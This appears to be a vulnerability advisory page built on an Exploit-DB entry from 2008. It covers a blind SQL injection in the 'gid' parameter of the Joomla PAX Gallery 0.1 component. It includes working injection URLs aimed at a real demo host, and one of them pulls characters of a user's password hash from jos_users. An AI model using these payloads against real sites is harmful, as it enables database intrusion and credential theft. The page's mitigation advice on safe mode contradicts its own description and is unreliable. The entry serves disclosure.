Joomla Component PAX Gallery v 0.1 (gid)

vendor:

Pax Gallery

by:

XaDoS (SecurityCode Team)

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Pax Gallery

Affected Version From: 0.1

Affected Version To: 0.1

Patch Exists: Yes

Related CWE: N/A

CPE: a:joomla:pax_gallery

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla Component PAX Gallery v 0.1 (gid) <= Blind SQL Injection Vulnerability

A vulnerability exists in Joomla Component PAX Gallery v 0.1 (gid) which allows an attacker to inject malicious SQL queries via the 'gid' parameter. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The vulnerability is only exploitable when the 'safe mode' is set to 'ON'.

Mitigation:

Ensure that the 'safe mode' is set to 'OFF' and update to the latest version of Joomla Component PAX Gallery.

Source

Exploit-DB raw data:

[â– ]  Joomla Component PAX Gallery v 0.1 (gid) <= Blind SQL Injection Vulnerability
 
>---------------------------------------<

> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> BÂ§g: Blind $ql inJection
> Note: safe mode = ON
> Autor script: Tobias Floery
>---------------------------------------<
 

[â– ] ExPL0iT:


|: http://www.example.com/path/com_paxgallery&task=table&gid=[$qL] 


[â– ] DÂ£M0: 

>Version:

|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=5  [Ye$]
 
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=4 [Noo]
 
 
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20ascii(substring((select%20password%20from%20jos_users%20limit%201,1),1,1))%3E100
 
d8e423..ecc... ;-)
 
[â– ] Th4nKs::
 
\> Str0ke </ \> Securitycode Team </ \> StaKer </

# milw0rm.com [2008-12-28]